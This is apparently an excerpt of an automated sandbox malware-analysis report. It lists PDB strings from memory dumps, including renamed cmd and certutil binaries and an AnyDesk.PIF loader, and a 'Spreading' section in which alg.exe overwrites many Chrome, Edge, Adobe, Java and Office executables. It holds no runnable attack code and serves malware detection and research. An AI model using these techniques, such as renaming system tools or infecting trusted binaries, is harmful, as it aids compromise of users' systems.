                      Source: Binary string: mavinject32.pdbGCTL source: alg.exe, 0000001D.00000003.2690766843.0000000001490000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: _.pdb source: Native_neworigin.exe, 0000001B.00000002.1714513945.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000001B.00000003.1443226587.000000000065A000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000001B.00000002.1767484584.000000000401D000.00000004.00000800.00020000.00000000.sdmp, Native_neworigin.exe, 0000001B.00000002.1781352411.00000000052D0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: alg.exe, 0000001D.00000003.2083482558.0000000000410000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: FXSSVC.pdb source: Native_neworigin.exe, 0000001B.00000003.1644259863.0000000005330000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: alg.exe, 0000001D.00000003.2650684922.0000000000610000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: alg.exe, 0000001D.00000003.2517364614.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: cmd.pdb source: alpha.exe, 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, alpha.exe, 00000009.00000000.1280279137.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, alpha.exe, 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, alpha.exe, 0000000B.00000000.1285426299.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, alpha.exe, 0000000D.00000002.1306669852.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, alpha.exe, 0000000D.00000000.1298979747.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, alpha.exe, 00000010.00000000.1307623271.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, alpha.exe, 00000010.00000002.1308916113.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, alpha.exe, 00000011.00000002.1311273643.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, alpha.exe, 00000011.00000000.1309412413.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, esentutl.exe, 00000015.00000003.1414346732.0000000005580000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdbGCTL source: AnyDesk.PIF, 0000000F.00000002.1459416504.0000000002E1E000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1311463700.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1418076900.0000000021AEF000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1311999021.000000007F920000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1311674784.0000000002BB7000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1418076900.0000000021AC0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1457046440.0000000002BB2000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1496446844.0000000020B24000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1444995649.00000000023C6000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1496446844.0000000020B60000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: ping.pdb source: esentutl.exe, 00000016.00000003.1418764393.00000000056A0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: D:\T\Acrobat\Installers\BootStrapExe_Small\Release_x64\Setup.pdb source: alg.exe, 0000001D.00000003.2568619306.0000000000620000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: alg.exe, 0000001D.00000003.2264299191.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: Acrobat_SL.pdb((( source: alg.exe, 0000001D.00000003.1936659520.0000000001550000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: Native_neworigin.exe, 0000001B.00000003.1519766371.0000000005E50000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: d:\dbs\el\omr\target\x64\ship\click2run\x-none\IntegratedOffice.pdb0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: alg.exe, 0000001D.00000003.2667411347.0000000001490000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: ADelRCP_Exec.pdbCC9 source: alg.exe, 0000001D.00000003.2195638183.0000000001490000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: D:\T\BuildResults\bin\Release_x64\Acrouserer.pdb source: alg.exe, 0000001D.00000003.1954090127.0000000001660000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdb source: AnyDesk.PIF, AnyDesk.PIF, 0000000F.00000002.1459416504.0000000002E1E000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1311463700.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1311999021.000000007F920000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1496446844.0000000020B24000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1444995649.00000000023C6000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1496446844.0000000020B60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DBA0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1397101171.000000007EDB0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DCC6000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1557125328.000000007EF26000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: Acrobat_SL.pdb source: alg.exe, 0000001D.00000003.1936659520.0000000001550000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: cmd.pdbUGP source: alpha.exe, 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, alpha.exe, 00000009.00000000.1280279137.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, alpha.exe, 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, alpha.exe, 0000000B.00000000.1285426299.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, alpha.exe, 0000000D.00000002.1306669852.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, alpha.exe, 0000000D.00000000.1298979747.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, alpha.exe, 00000010.00000000.1307623271.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, alpha.exe, 00000010.00000002.1308916113.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, alpha.exe, 00000011.00000002.1311273643.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, alpha.exe, 00000011.00000000.1309412413.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, esentutl.exe, 00000015.00000003.1414346732.0000000005580000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: alg.exe, 0000001D.00000003.2580817829.0000000000620000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.2598730489.0000000000400000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.2579062872.0000000000610000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: D:\T\Acrobat\Installers\BootStrapExe_Small\Release_x64\Setup.pdb} source: alg.exe, 0000001D.00000003.2568619306.0000000000620000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: ping.pdbGCTL source: esentutl.exe, 00000016.00000003.1418764393.00000000056A0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: certutil.pdb source: kn.exe, 0000000C.00000002.1297481760.00007FF627B5E000.00000002.00000001.01000000.00000006.sdmp, kn.exe, 0000000C.00000000.1286664343.00007FF627B5E000.00000002.00000001.01000000.00000006.sdmp, kn.exe, 0000000E.00000000.1299867443.00007FF627B5E000.00000002.00000001.01000000.00000006.sdmp, kn.exe, 0000000E.00000002.1305778842.00007FF627B5E000.00000002.00000001.01000000.00000006.sdmp
                      Source: Binary string: easinvoker.pdbH source: AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DBA0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1397101171.000000007EDB0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DCC6000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1557125328.000000007EF26000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: alg.exe, 0000001D.00000003.2083482558.0000000000410000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: mavinject32.pdb source: alg.exe, 0000001D.00000003.2690766843.0000000001490000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: maintenanceservice.pdb source: alg.exe, 0000001D.00000003.1831857242.00000000016A0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: alg.exe, 0000001D.00000003.2650684922.0000000000610000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: certutil.pdbGCTL source: kn.exe, 0000000C.00000002.1297481760.00007FF627B5E000.00000002.00000001.01000000.00000006.sdmp, kn.exe, 0000000C.00000000.1286664343.00007FF627B5E000.00000002.00000001.01000000.00000006.sdmp, kn.exe, 0000000E.00000000.1299867443.00007FF627B5E000.00000002.00000001.01000000.00000006.sdmp, kn.exe, 0000000E.00000002.1305778842.00007FF627B5E000.00000002.00000001.01000000.00000006.sdmp
                      Source: Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: alg.exe, 0000001D.00000003.2392507411.0000000000620000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: alg.exe, 0000001D.00000003.2264299191.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DBA0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1397101171.000000007EDB0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DCC6000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1557125328.000000007EF26000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: alg.exe, 0000001D.00000003.2479887474.0000000000650000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_userers\32BitMAPIuserer.pdb@@ source: alg.exe, 0000001D.00000003.2424853674.0000000000620000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: d:\dbs\el\omr\target\x64\ship\click2run\x-none\IntegratedOffice.pdb source: alg.exe, 0000001D.00000003.2667411347.0000000001490000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: maintenanceservice.pdb` source: alg.exe, 0000001D.00000003.1831857242.00000000016A0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: alg.exe, 0000001D.00000003.2517364614.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\CRLogTransport\public\binary\Win\x64\Release\CRLogTransport.pdb source: alg.exe, 0000001D.00000003.2297694474.0000000000450000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: ALG.pdb source: Native_neworigin.exe, 0000001B.00000003.1444838110.0000000005B00000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: Native_neworigin.exe, 0000001B.00000003.1519766371.0000000005E50000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: ALG.pdbGCTL source: Native_neworigin.exe, 0000001B.00000003.1444838110.0000000005B00000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: D:\T\BuildResults\bin\Release_x64\Acrouserer.pdbTTT source: alg.exe, 0000001D.00000003.1954090127.0000000001660000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: FXSSVC.pdbGCTL source: Native_neworigin.exe, 0000001B.00000003.1644259863.0000000005330000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: AppVShNotify.pdb source: alg.exe, 0000001D.00000003.2627543341.0000000000620000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_userers\32BitMAPIuserer.pdb source: alg.exe, 0000001D.00000003.2424853674.0000000000620000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\CRLogTransport\public\binary\Win\x64\Release\CRLogTransport.pdbQ source: alg.exe, 0000001D.00000003.2297694474.0000000000450000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: AppVShNotify.pdbGCTL source: alg.exe, 0000001D.00000003.2627543341.0000000000620000.00000004.00001000.00020000.00000000.sdmp

                      Spreading

                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\pingsender.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\chrome_pwa_launcher.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\elevation_service.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeSystem file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\7z.exe
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeSystem file written: C:\Windows\System32\AppVClient.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\crashreporter.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\64BitMAPIuserer.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\7zG.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\MSRMSPIuserer.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\notification_helper.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateuserer.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\Installer\chrmstp.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\firefox.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrouserer.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\updater.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateuserer.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeSystem file written: C:\Windows\System32\FXSSVC.exe
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeSystem file written: C:\Windows\System32\alg.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\7zFM.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\32BitMAPIuserer.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\Installer\setup.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\private_browsing.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
